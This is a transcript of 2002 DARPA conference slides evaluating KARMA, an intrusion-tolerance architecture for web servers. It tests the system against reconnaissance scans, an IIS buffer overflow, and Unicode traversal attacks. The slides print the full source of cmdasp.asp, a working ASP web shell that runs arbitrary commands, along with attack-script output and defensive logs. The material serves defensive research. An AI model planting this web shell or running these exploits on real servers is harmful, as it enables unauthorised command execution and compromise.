darpa oasis pi meeting – hilton head – march 12-15, 2002slide 1 aegis research corporation karma...
TRANSCRIPT
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 1
Aegis Research Corporation
KARMAKinetic Application of Redundancy to Mitigate Attacks
(Intrusion Tolerance Using Masking, Redundancy and Dispersion)
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002
Janet Lepanto
William Weinstein
The Charles Stark Draper Laboratory, Inc.
Aegis Research Corporation®
Aegis Research Corporation
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 2
Aegis Research Corporation
Overview
• Objectives and Assumptions
• Preliminary Test Results
• Validation Test Strategy
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 3
Aegis Research Corporation
Objectives and Assumptions
• Objectives
– Employ only a small set of trusted components to protect a large set of untrusted unmodified COTS servers and databases
– Minimize loss of data confidentiality and integrity in the presence of a successful attack on one of the servers
– Tolerate attacks whose specific signatures are not known a priori
• Assumptions
– Attacker desires stealth so transaction rates will be relatively low
– Attacks employing high transaction rates and recognizable signatures will be addressed by front-end firewalls and/or other intrusion detection mechanisms
– Exploitation of latent vulnerabilities will require more than a single transaction
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 4
Aegis Research Corporation
ArchitectureE
xter
nal
WA
N
ExternalFirewall
DataBase
TransactionMediator
Gateway
Sw
itch
ed I
P
Server(1)
Server(N)
Server(2)
Configuration Manager
Sw
itch
ed I
P
COTS
Trusted
Other
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 5
Aegis Research Corporation
Mechanisms
• Gateway
– Mask identities of origin server operating systems and web server applications
– Distribute client transactions among the origin servers such that the client cannot predict which server will handle a transaction
• Configuration Manager
– Monitor status of origin servers (via agent on each server) for anomalies
– Reconfigure server to “clean” state if anomalies are detected
• Transaction Mediator
– Log transactions to back-end database to support rollback recovery
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 6
Aegis Research Corporation
KARMA Preliminary Testing
• Discovery– OS identification
– Web server enumeration
– Probing with malformed request
• Web Server Exploitation– Buffer overflow exploit to get shell command
– Unicode exploit
– Multi-transaction Unicode attack to plant executable
– Smart multi-transaction attack with server agents active
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 7
Aegis Research Corporation
OS identification attempts to guess the operating system and version of a remote system
Freely available programs used for OS identification include xprobe (icmp based), queso, and nmap
By identifying the specific operating system of a target platform, a hacker can focus the attack, minimizing time and attack signatures
KARMA masks OS identity of the Gateway
Discovery(OS Identification)
Gateway
Configuration Manager
Server(2)
Server(1)
Server(N)
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 8
Aegis Research Corporation
Unable to determine OS of remote system
Time required for this activity is relatively long
OS identification run against KARMA public IP address
Discovery (OS Identification)
Starting nmap V. 2.53 by [email protected] ( www.insecure.org/nmap/ )
Interesting ports on (192.80.95.40):
Port State Service
80/tcp open http
TCP Sequence Prediction: Class=random positive increments
Difficulty=38245 (Worthy challenge)
No OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi).
Nmap run completed – 1 IP address (1 hosts up) scanned in 24 seconds
[root@aegis With-KARMA]# nmap -sT -n -r –p 80 -P0 -O its.c4i.draper.com
Starting nmap V. 2.53 by [email protected] ( www.insecure.org/nmap/ )
Interesting ports on (192.80.95.40):
Port State Service
80/tcp open http
TCP Sequence Prediction: Class=random positive increments
Difficulty=38245 (Worthy challenge)
No OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi).
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 9
Aegis Research Corporation
Web server enumeration attempts to remotely determine the currently running version of web server software
In response to a HEAD command, web servers typically reveal the version of the software in the “Server” field of the HTTP response
Successful enumeration allows a hacker to focus the attack against the specific web server software
KARMA scrubs web server responses to mask the identity of the responding web serverRemoves specific identifying information
(e.g., “Server” header)
Removes server unique information such as E-tags
Reformats error responses to mask serverunique implementations
Discovery (Web Server Enumeration)
Gateway
Configuration Manager
Server(2)
Server(1)
Server(N)
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 10
Aegis Research Corporation
Issue the HEAD command to the server
“Server” field identifies the server as Microsoft-IIS/4.0
Probe web server directly
Discovery (Web Server Enumeration)
[root@mystic Without-KARMA]# nc 192.168.0.14 80
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Content-Location: http://192.168.0.14/Default.htm
Date: Fri, 04 Jan 2002 19:41:23 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Wed, 02 Jan 2002 21:36:45 GMT
ETag: "804e5a95c5ec11:b84"
Content-Length: 6783
Server: Microsoft-IIS/4.0
HEAD / HTTP/1.0
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 11
Aegis Research Corporation
Issue the HEAD command to the server
“Server” field no longer present in the HTTP response
Probe web server via KARMA
Discovery (Web Server Enumeration)
[root@aegis With-KARMA]# nc its.c4i.draper.com 80
HTTP/1.1 200 OK
Connection: close
Date: Fri, 04 Jan 2002 22:40:28 GMT
Accept-Ranges: bytes
Content-Length: 6913
Content-Type: text/html
Last-Modified: Wed, 02 Jan 2002 21:36:45 GMT
HEAD / HTTP/1.0
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 12
Aegis Research Corporation
System often discloses information when responding to erroneous conditions
Attackers can trigger such disclosure and use the information to create a blueprint of the target network
Upon receiving a malformed request to an existing directory the web server responds with an error message that contains its internal IP address
KARMA sanitizes error responses from the web servers and and then forwards them to the user
Discovery (Probing with a Malformed Request)
Gateway
Configuration Manager
Server(2)
Server(1)
Server(N)
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 13
Aegis Research Corporation
The web server returns a “302 Object Moved” error
Error message contains the internal IP address
Issue “GET /html” directly to an origin server
Discovery (Probing with a Malformed Request)
HTTP/1.1 302 Object Moved
Location: http://192.168.0.14/html/
Server: Microsoft-IIS/4.0
Content-Type: text/html
Content-Length: 141
<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found
<a HREF="http://192.168.0.14/html/">here</a></body>
[root@mystic Without-KARMA]# nc 192.168.0.14 80
GET /html HTTP/1.0
HTTP/1.1 302 Object Moved
Location: http://192.168.0.14/html/
Server: Microsoft-IIS/4.0
Content-Type: text/html
Content-Length: 141
<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found
<a HREF="http://192.168.0.14/html/">here</a></body>
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 14
Aegis Research Corporation
Web server returns a “301 Moved Permanently” error
Error message does not contain internal IP address
Issue “GET /html” via KARMA
Discovery (Probing with a Malformed Request)
HTTP/1.1 301 Moved Permanently
Connection: close
Location: http://its.c4i.draper.com/html/
Content-Length: 254
<HTML><HEAD><TITLE>301 - Moved Permanently</TITLE></HEAD>
<BODY><FONT SIZE=6><B>301 - Moved Permanently</B></FONT><BR><BR><FONT SIZE=4>
<a href=" http://its.c4i.draper.com/html/"> http://its.c4i.draper.com/html/</a></FONT>
</BODY></HTML>
[root@aegis With-KARMA]# nc its.c4i.draper.com 80
GET /html HTTP/1.0
HTTP/1.1 301 Moved Permanently
Connection: close
Location: http://its.c4i.draper.com/html/
Content-Length: 254
<HTML><HEAD><TITLE>301 - Moved Permanently</TITLE></HEAD>
<BODY><FONT SIZE=6><B>301 - Moved Permanently</B></FONT><BR><BR><FONT SIZE=4>
<a href=" http://its.c4i.draper.com/html/"> http://its.c4i.draper.com/html/</a></FONT>
</BODY></HTML>
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 15
Aegis Research Corporation
Windows 2000 Internet printing ISAPI extension is vulnerable to a buffer overflow exploit
Exploit causes buffer overflow on the IIS web server which returns a command shell to attacker on TCP port 81
This command shell has administrator level access, enabling the attacker to modify all data on the machine and launch additional attacks from the compromised server
Web Server Exploitation(Buffer Overflow)
Gateway
Configuration Manager
Server(2)
Server(1)
Server(N)
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 16
Aegis Research Corporation
Command shell returned from server “ver” command returns the version of windows
Execute directly against server and listen for shell on port 81
Web Server Exploitation(Buffer Overflow)
“ipconfig /all” reports the server’s network configuration
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 17
Aegis Research Corporation
Unsuccessful, command shell is never returned
Attack is thwarted
Execute via KARMA and listen for shell on port 81
Web Server Exploitation(Buffer Overflow)
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 18
Aegis Research Corporation
Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot “../” directory traversal exploitation if extended Unicode character representations are used in substitution for “/” and “\” (such as %c0 and %af)
This vulnerability enables unauthenticated to access any known file or program on the web server
Successful exploitation would yield the same privileges as a user who could remotely log onto the system with no credentials
Web Server Exploitation(Unicode Exploit)
Gateway
Configuration Manager
Server(2)
Server(1)
Server(N)
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 19
Aegis Research Corporation
“dir c:\” reveals the contents of the root directory “ver” command returns the version of windows
Execute Unicode attack directly against server
Web Server Exploitation(Unicode Exploit)
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 20
Aegis Research Corporation
“dir c:\” sent to server several times before success “ver” returns error message for every request
Execute Unicode attack via KARMA
Web Server Exploitation(Unicode Exploit)
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 21
Aegis Research Corporation
A multi-transaction Unicode attack requires a sequence of successful Unicode requests (transactions). For example, uploading a file line by line using the windows “echo” command
Attacker uploads for exploit the web server.cmdasp.asp (exploit allows the attacker to execute commands with system
level privileges)
upload.asp (script allows an attacker to upload files via HTTP)
KARMA dispersion makes multi-transaction attacks more difficult Increases the time required to exploit the web server
Increases the attack signature and probability of detection
Web Server Exploitation(Multi-Transaction)
Gateway
Configuration Manager
Server(2)
Server(1)
Server(N)
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 22
Aegis Research Corporation
Web Server Exploitation(Multi-Transaction)
unicodeloader.pl uploads the file cmdasp.asp line by line utilizing the “echo” command in multiple Unicode strings
cmdasp.asp – web script to exploit local windows vulnerability that enables the attacker to execute commands with system level privileges
Attacker accesses cmdasp.asp with a web browser and enters commands
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 23
Aegis Research Corporation
Web Server Exploitation(Multi-Transaction)
Attack web server directly
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 24
Aegis Research Corporation
Web Server Exploitation(Multi-Transaction)
Attack web servers via KARMA
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 25
Aegis Research Corporation
“cmdasp.asp” with KARMA3 - Dim oScriptNet 10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 13 - szTempFile = "C:\" & oFileSys.GetTempName( ) 17 - %> 20 - <FORM action="<%= Request.ServerVariables("URL") %>" method="POST"> 23 - </FORM> 25 - <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> 28 - If (IsObject(oFile)) Then 32 - Call oFileSys.DeleteFile(szTempFile, True) 36 - </HTML>
“cmdasp.asp” without KARMA1 - <%@ Language=VBScript %>2 - <%3 - Dim oScript4 - Dim oScriptNet5 - Dim oFileSys, oFile6 - Dim szCMD, szTempFile7 - On Error Resume Next8 - Set oScript = Server.CreateObject("WSCRIPT.SHELL")9 - Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")11 - szCMD = Request.Form(".CMD")12 - If (szCMD <> "") Then13 - szTempFile = "C:\" & oFileSys.GetTempName( )14 - Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)15 - Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)16 - End If17 - %>18 - <HTML>19 - <BODY>20 - <FORM action="<%= Request.ServerVariables("URL") %>" method="POST">21 - <input type=text name=".CMD" size=45 value="<%= szCMD %>">22 - <input type=submit value="Run">23 - </FORM>24 - <PRE>25 - <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>26 - <br>27 - <%28 - If (IsObject(oFile)) Then29 - On Error Resume Next30 - Response.Write Server.HTMLEncode(oFile.ReadAll)31 - oFile.Close32 - Call oFileSys.DeleteFile(szTempFile, True)33 - End If34 - %>35 - </BODY> 36 - </HTML>
Web Server Exploitation(Multi-Transaction)
“cmdasp.asp” without KARMA1 - <%@ Language=VBScript %>2 - <%3 - Dim oScript4 - Dim oScriptNet5 - Dim oFileSys, oFile6 - Dim szCMD, szTempFile7 - On Error Resume Next8 - Set oScript = Server.CreateObject("WSCRIPT.SHELL")9 - Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")11 - szCMD = Request.Form(".CMD")12 - If (szCMD <> "") Then13 - szTempFile = "C:\" & oFileSys.GetTempName( )14 - Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)15 - Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)16 - End If17 - %>18 - <HTML>19 - <BODY>20 - <FORM action="<%= Request.ServerVariables("URL") %>" method="POST">21 - <input type=text name=".CMD" size=45 value="<%= szCMD %>">22 - <input type=submit value="Run">23 - </FORM>24 - <PRE>25 - <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>26 - <br>27 - <%28 - If (IsObject(oFile)) Then29 - On Error Resume Next30 - Response.Write Server.HTMLEncode(oFile.ReadAll)31 - oFile.Close32 - Call oFileSys.DeleteFile(szTempFile, True)33 - End If34 - %>35 - </BODY> 36 - </HTML>
“cmdasp.asp” with KARMA3 - Dim oScriptNet 10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 13 - szTempFile = "C:\" & oFileSys.GetTempName( ) 17 - %> 20 - <FORM action="<%= Request.ServerVariables("URL") %>" method="POST"> 23 - </FORM> 25 - <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> 28 - If (IsObject(oFile)) Then 32 - Call oFileSys.DeleteFile(szTempFile, True) 36 - </HTML>
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 26
Aegis Research Corporation
An attacker with detailed knowledge of the KARMA environment can initiate an advanced multi-transaction Unicode attack with error checking.
Upload a line of the script and then recursively checks for success Create unique directory and “echo” first line of script Check unique directory for file size to verify successful upload If successful “echo” line two and continue process else retry first line
Server Agent detects changes to origin server configuration Server stopped and taken out of service by Configuration Manager Rebuilt from trusted archive Returned to service
Web Server Exploitation(KARMA Server Agents Active)
Gateway
Configuration Manager
Server(2)
Server(1)
Server(N)
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 27
Aegis Research Corporation
Web Server Exploitation(KARMA Server Agents Active)
exploiting directory: C:\Inetpub\scripts\adv-uniloader
uploading ASP section:
sending line 1 of 36
Checking directory for upload..
Line uploaded SUCCESSFULL. cmdasp.asp is now 4482 bytes.
Advanced Unicode upload utility with error checking
[root@aegis With-KARMA]# adv-uniloader.pl 192.80.95.40:80 cmdasp.asp
First line successfully uploaded to server on first attempt
Second line fails several times due to dispersion mechanism
Agent identifies attack and shuts down server
exploiting directory: C:\Inetpub\scripts\adv-uniloader
uploading ASP section:
sending line 1 of 36
Checking directory for upload..
Line uploaded SUCCESSFULL. cmdasp.asp is now 4482 bytes.
sending line 2 of 36
Checking directory for upload..
Upload NOT successfull cmdasp.asp is still 4482 bytes
sending line 2 of 36
Checking directory for upload..
Upload NOT successfull cmdasp.asp is still 4482 bytes
sending line 2 of 36
Checking directory for upload..
Line uploaded SUCCESSFULL. cmdasp.asp is now 4487 bytes.
exploiting directory: C:\Inetpub\scripts\adv-uniloader
uploading ASP section:
sending line 1 of 36
Checking directory for upload..
Line uploaded SUCCESSFULL. cmdasp.asp is now 4482 bytes.
sending line 2 of 36
Checking directory for upload..
Upload NOT successfull cmdasp.asp is still 4482 bytes
sending line 2 of 36
Checking directory for upload..
Upload NOT successfull cmdasp.asp is still 4482 bytes
sending line 2 of 36
Checking directory for upload..
Line uploaded SUCCESSFULL. cmdasp.asp is now 4487 bytes.
sending line 3 of 36
Checking directory for upload..
Checking directory for upload..
Checking directory for upload..
Checking directory for upload..
Checking directory for upload..
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 28
Aegis Research Corporation
Web Server Exploitation(KARMA Server Agent Log)
Server 4 Agent log file
No anomalies detected by the Server Agent on server 4
Attack detected, stop server, refresh content to original data, and restart web service
Attack remediated, server 4 back to normal operation
in tier 3: tier completion reporting, verbosity 1, failures 0
in tier 2: tier completion reporting, verbosity 1, failures 0
in tier 2: tier completion reporting, verbosity 1, failures 1
in tier 2: tier completion reporting, verbosity 1, failures 1
connection to CM closed: fd=164
The World Wide Web Publishing Service service is stopping.got cleanup_restart command
The World Wide Web Publishing Service service was stopped successfully.
The IIS Admin Service service is stopping...
The IIS Admin Service service was stopped successfully.
The Content Index service is stopping.
The Content Index service was stopped successfully.
The Content Index service is starting.
The Content Index service was started successfully.
The World Wide Web Publishing Service service is starting...
The World Wide Web Publishing Service service was started successfully.
in osa: need to refresh tier 1
in osa: need to refresh tier 2
in osa: need to refresh tier 3
in osa: need to refresh tier 4
in tier 2: tier completion reporting, verbosity 1, failures 0
in tier 2: tier completion reporting, verbosity 1, failures 0
in tier 3: tier completion reporting, verbosity 1, failures 0
in tier 2: tier completion reporting, verbosity 1, failures 0
in tier 2: tier completion reporting, verbosity 1, failures 1
in tier 2: tier completion reporting, verbosity 1, failures 1
connection to CM closed: fd=164
The World Wide Web Publishing Service service is stopping.got cleanup_restart command
The World Wide Web Publishing Service service was stopped successfully.
The IIS Admin Service service is stopping...
The IIS Admin Service service was stopped successfully.
The Content Index service is stopping.
The Content Index service was stopped successfully.
The Content Index service is starting.
The Content Index service was started successfully.
The World Wide Web Publishing Service service is starting...
The World Wide Web Publishing Service service was started successfully.
in osa: need to refresh tier 1
in osa: need to refresh tier 2
in osa: need to refresh tier 3
in osa: need to refresh tier 4
in tier 2: tier completion reporting, verbosity 1, failures 0
in tier 2: tier completion reporting, verbosity 1, failures 0
in tier 3: tier completion reporting, verbosity 1, failures 0
in tier 2: tier completion reporting, verbosity 1, failures 0
in tier 2: tier completion reporting, verbosity 1, failures 1
in tier 2: tier completion reporting, verbosity 1, failures 1
connection to CM closed: fd=164
The World Wide Web Publishing Service service is stopping.got cleanup_restart command
The World Wide Web Publishing Service service was stopped successfully.
The IIS Admin Service service is stopping...
The IIS Admin Service service was stopped successfully.
The Content Index service is stopping.
The Content Index service was stopped successfully.
The Content Index service is starting.
The Content Index service was started successfully.
The World Wide Web Publishing Service service is starting...
The World Wide Web Publishing Service service was started successfully.
in osa: need to refresh tier 1
in osa: need to refresh tier 2
in osa: need to refresh tier 3
in osa: need to refresh tier 4
in tier 2: tier completion reporting, verbosity 1, failures 0
in tier 2: tier completion reporting, verbosity 1, failures 0
in tier 3: tier completion reporting, verbosity 1, failures 0
in tier 2: tier completion reporting, verbosity 1, failures 0
in tier 2: tier completion reporting, verbosity 1, failures 1
in tier 2: tier completion reporting, verbosity 1, failures 1
connection to CM closed: fd=164
The World Wide Web Publishing Service service is stopping.got cleanup_restart command
The World Wide Web Publishing Service service was stopped successfully.
The IIS Admin Service service is stopping...
The IIS Admin Service service was stopped successfully.
The Content Index service is stopping.
The Content Index service was stopped successfully.
The Content Index service is starting.
The Content Index service was started successfully.
The World Wide Web Publishing Service service is starting...
The World Wide Web Publishing Service service was started successfully.
in osa: need to refresh tier 1
in osa: need to refresh tier 2
in osa: need to refresh tier 3
in osa: need to refresh tier 4
in tier 2: tier completion reporting, verbosity 1, failures 0
in tier 2: tier completion reporting, verbosity 1, failures 0
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 29
Aegis Research Corporation
1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0
1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0
1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0
1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0
1015623460:455132 192.168.0.14:5104 1 0 1015623614:276 3 0
1015623460:768275 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623460:768291 192.168.0.12:5104 1 0 1015623614:276 3 0
1015623467:535619 192.168.0.14:5104 1 3 1015623614:276 2 2 c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref=1013802544:0 gath=1015623975:0
1015623467:535636 192.168.0.14:5104 1 0 1015623614:276 2 1
1015623467:847902 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623468:448854 192.168.0.11:5104 1 0 1015623543:385173 2 0
1015623468:546676 192.168.0.14:5104 1 3 1015623614:276 2 2 c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref=1013802544:0 gath=1015623975:0
1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0
1015623458:745560 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0
1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0
1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0
Web Server Exploitation(KARMA Configuration Manager Log)
Configuration Manager log file
Server agents reporting OK
Problem identified by server 4, unauthorized file c:\inetpub\scripts\advuni\cmdasp.asp detected
Server 4 back to normal operation, servers reporting OK
1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0
1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0
1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0
1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0
1015623460:455132 192.168.0.14:5104 1 0 1015623614:276 3 0
1015623460:768275 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623460:768291 192.168.0.12:5104 1 0 1015623614:276 3 0
1015623467:535619 192.168.0.14:5104 1 3 1015623614:276 2 2 c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref=1013802544:0 gath=1015623975:0
1015623467:535636 192.168.0.14:5104 1 0 1015623614:276 2 1
1015623467:847902 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623468:448854 192.168.0.11:5104 1 0 1015623543:385173 2 0
1015623468:546676 192.168.0.14:5104 1 3 1015623614:276 2 2 c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref=1013802544:0 gath=1015623975:0
1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0
1015623458:745560 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0
1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0
1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0
1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0
1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0
1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0
1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0
1015623460:455132 192.168.0.14:5104 1 0 1015623614:276 3 0
1015623460:768275 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623460:768291 192.168.0.12:5104 1 0 1015623614:276 3 0
1015623467:535619 192.168.0.14:5104 1 3 1015623614:276 2 2 c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref=1013802544:0 gath=1015623975:0
1015623467:535636 192.168.0.14:5104 1 0 1015623614:276 2 1
1015623467:847902 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623468:448854 192.168.0.11:5104 1 0 1015623543:385173 2 0
1015623468:546676 192.168.0.14:5104 1 3 1015623614:276 2 2 c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref=1013802544:0 gath=1015623975:0
1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0
1015623458:745560 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0
1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0
1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0
1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0
1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0
1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0
1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0
1015623460:455132 192.168.0.14:5104 1 0 1015623614:276 3 0
1015623460:768275 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623460:768291 192.168.0.12:5104 1 0 1015623614:276 3 0
1015623467:535619 192.168.0.14:5104 1 3 1015623614:276 2 2 c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref=1013802544:0 gath=1015623975:0
1015623467:535636 192.168.0.14:5104 1 0 1015623614:276 2 1
1015623467:847902 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623468:448854 192.168.0.11:5104 1 0 1015623543:385173 2 0
1015623468:546676 192.168.0.14:5104 1 3 1015623614:276 2 2 c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref=1013802544:0 gath=1015623975:0
1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0
1015623458:745560 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0
1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0
1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 30
Aegis Research Corporation
Summary of Preliminary Test Results
• Discovery– Scanning tools could not determine OS of Gateway
• Origin servers not directly exposed to OS scans
– Probing to create web servers error responses failed to uncover web server type• Web Server Exploitation
– Buffer overflow of printing extension failed to return command shell– Execution of single string Unicode exploits slowed by dispersion mechanism
• KARMA architecture rendered some “pseudo shell commands” ineffective• Exploit was able to return directory information
– Multi-transaction file buildup thwarted by dispersion mechanism– Smart multi-transaction file buildup stopped by server agent
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 31
Aegis Research Corporation
Validation Test Strategy
• Controlled Vulnerability Testing• Configure origin servers with known weaknesses
• Compare effect of attacks directly on server with same attack via KARMA
• Blind Red Team Testing• Configure origin servers with latest security patches
• Give the Red team no information at all about the system
• Objective is to compromise the data base
• Targeted Red Team Testing• Configure origin servers with latest security patches
• Inform the red team about the general architecture and operating strategy, but provide no details
• Objective is to compromise the data base